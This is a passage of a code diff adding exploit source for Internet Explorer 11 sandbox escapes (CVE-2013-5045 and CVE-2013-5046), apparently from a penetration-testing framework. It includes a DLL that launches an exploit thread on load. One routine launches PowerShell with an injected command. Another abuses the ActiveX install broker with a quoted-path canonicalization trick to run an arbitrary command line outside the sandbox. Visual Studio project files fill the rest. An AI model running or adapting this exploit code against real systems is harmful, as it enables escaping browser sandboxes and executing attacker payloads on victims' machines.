MyCreateProcess(GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0\\powershell.exe", L"powershell.exe " + GetExploitUrl(L"PSH_CMD"));
|
||||
}
|
||||
catch (...)
|
||||
{
|
||||
}
|
||||
|
||||
if (hSection)
|
||||
{
|
||||
CloseHandle(hSection);
|
||||
}
|
||||
|
||||
if (hKey)
|
||||
{
|
||||
RegCloseKey(hKey);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID hModule)
|
||||
{
|
||||
CoInitialize(nullptr);
|
||||
DoRegistrySymlink();
|
||||
CoUninitialize();
|
||||
|
||||
FreeLibraryAndExitThread((HMODULE)hModule, 0);
|
||||
}
|
188
external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj
vendored
Executable file
188
external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj
vendored
Executable file
|
@ -0,0 +1,188 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>CVE20140268</RootNamespace>
|
||||
<ProjectName>CVE-2013-5045</ProjectName>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<ModuleDefinitionFile>
|
||||
</ModuleDefinitionFile>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="CVE-2013-5045.cpp" />
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
</PrecompiledHeader>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
|
||||
<Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
|
||||
</ProjectReference>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,23 @@
|
|||
// dllmain.cpp : Defines the entry point for the DLL application.
|
||||
#include "stdafx.h"
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID hModule);
|
||||
|
||||
BOOL APIENTRY DllMain( HMODULE hModule,
|
||||
DWORD ul_reason_for_call,
|
||||
LPVOID lpReserved
|
||||
)
|
||||
{
|
||||
switch (ul_reason_for_call)
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
|
||||
break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// CVE-2014-0268.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,11 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <windows.h>
|
||||
#include <Utils.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
127
external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp
vendored
Executable file
127
external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp
vendored
Executable file
|
@ -0,0 +1,127 @@
|
|||
// This file is part of IE11SandboxEsacapes.
|
||||
|
||||
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
|
||||
// it under the terms of the GNU General Public License as published by
|
||||
// the Free Software Foundation, either version 3 of the License, or
|
||||
// (at your option) any later version.
|
||||
|
||||
// IE11SandboxEscapes is distributed in the hope that it will be useful,
|
||||
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
// GNU General Public License for more details.
|
||||
|
||||
// You should have received a copy of the GNU General Public License
|
||||
// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
#include "stdafx.h"
|
||||
#include <Utils.h>
|
||||
#include <Shlwapi.h>
|
||||
|
||||
#pragma comment(lib, "shlwapi.lib")
|
||||
|
||||
typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker);
|
||||
|
||||
void DoAXExploit()
|
||||
{
|
||||
try
|
||||
{
|
||||
HRESULT ret = E_FAIL;
|
||||
|
||||
IIEUserBrokerPtr broker = CreateBroker();
|
||||
|
||||
DebugPrintf("Created User Broker: %p\n", broker);
|
||||
|
||||
IIEAxInstallBrokerBrokerPtr axInstallBroker = broker;
|
||||
|
||||
DebugPrintf("Created AX Install Broker: %p\n", axInstallBroker);
|
||||
|
||||
IUnknownPtr unk;
|
||||
|
||||
ret = axInstallBroker->BrokerGetAxInstallBroker(__uuidof(CIEAxInstallBroker), IID_IUnknown, 0, 2, nullptr, &unk);
|
||||
if (FAILED(ret))
|
||||
{
|
||||
DebugPrintf("Failed to create install broker\n");
|
||||
throw _com_error(ret);
|
||||
}
|
||||
|
||||
IIeAxiAdminInstallerPtr admin = unk;
|
||||
|
||||
bstr_t sessionGuid;
|
||||
bstr_t empty;
|
||||
|
||||
ret = admin->InitializeAdminInstaller(empty, empty, sessionGuid.GetAddress());
|
||||
if (FAILED(ret))
|
||||
{
|
||||
DebugPrintf("Failed initialize admin interface\n");
|
||||
throw _com_error(ret);
|
||||
}
|
||||
|
||||
DebugPrintf("Initialize: %ls\n", sessionGuid.GetBSTR());
|
||||
|
||||
IIeAxiInstaller2Ptr installer = unk;
|
||||
|
||||
DebugPrintf("Installer: %p", installer);
|
||||
|
||||
unsigned char* details = nullptr;
|
||||
unsigned int detailsLength = 0;
|
||||
|
||||
CLSID mgrclsid;
|
||||
|
||||
// Not important really
|
||||
CLSIDFromString(L"4871A87A-BFDD-4106-8153-FFDE2BAC2967", &mgrclsid);
|
||||
|
||||
/*bstr_t url = L"http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.8.cab#Version=2,2,4,8";
|
||||
bstr_t path = L"C:\\users\\user\\desktop\\dlm-activex-2.2.4.8.cab";*/
|
||||
|
||||
bstr_t path = GetWindowsSystemDirectory() + L"\\notepad.exe";
|
||||
|
||||
bstr_t fullPath;
|
||||
|
||||
// Verify a local "signed" file, doesn't really matter what, we are not going to run it
|
||||
ret = installer->VerifyFile(sessionGuid, nullptr, path, path, bstr_t(L""),
|
||||
0, 0, mgrclsid, fullPath.GetAddress(), &detailsLength, &details);
|
||||
|
||||
if (FAILED(ret))
|
||||
{
|
||||
throw _com_error(ret);
|
||||
}
|
||||
|
||||
WCHAR newPath[MAX_PATH];
|
||||
|
||||
wcscpy_s(newPath, fullPath);
|
||||
|
||||
PathRemoveFileSpec(newPath);
|
||||
|
||||
// Install file to dummy location, use canonicalization trick to escape quotes later
|
||||
ret = installer->InstallFile(sessionGuid, nullptr, bstr_t(newPath), bstr_t(PathFindFileName(fullPath)),
|
||||
GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp", bstr_t(L"testbin.exe"), 0);
|
||||
DebugPrintf("InstallFile: %08X\n", ret);
|
||||
|
||||
if (FAILED(ret))
|
||||
{
|
||||
throw _com_error(ret);
|
||||
}
|
||||
|
||||
bstr_t installPath = GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp\\testbin.exe";
|
||||
|
||||
PROCESS_INFORMATION procInfo = { 0 };
|
||||
|
||||
// Run our arbitrary command line
|
||||
ret = installer->RegisterExeFile(sessionGuid, installPath, 0, &procInfo);
|
||||
}
|
||||
catch (_com_error e)
|
||||
{
|
||||
DebugPrintf("Error: %ls\n", e.ErrorMessage());
|
||||
}
|
||||
}
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID hModule)
|
||||
{
|
||||
CoInitialize(NULL);
|
||||
|
||||
DoAXExploit();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
FreeLibraryAndExitThread((HMODULE)hModule, 0);
|
||||
}
|
182
external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj
vendored
Executable file
182
external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj
vendored
Executable file
|
@ -0,0 +1,182 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{7A9AC14A-00BC-4A69-9B86-C80635606FEA}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>CVE20140268</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="CVE-2013-5046.cpp" />
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
</PrecompiledHeader>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
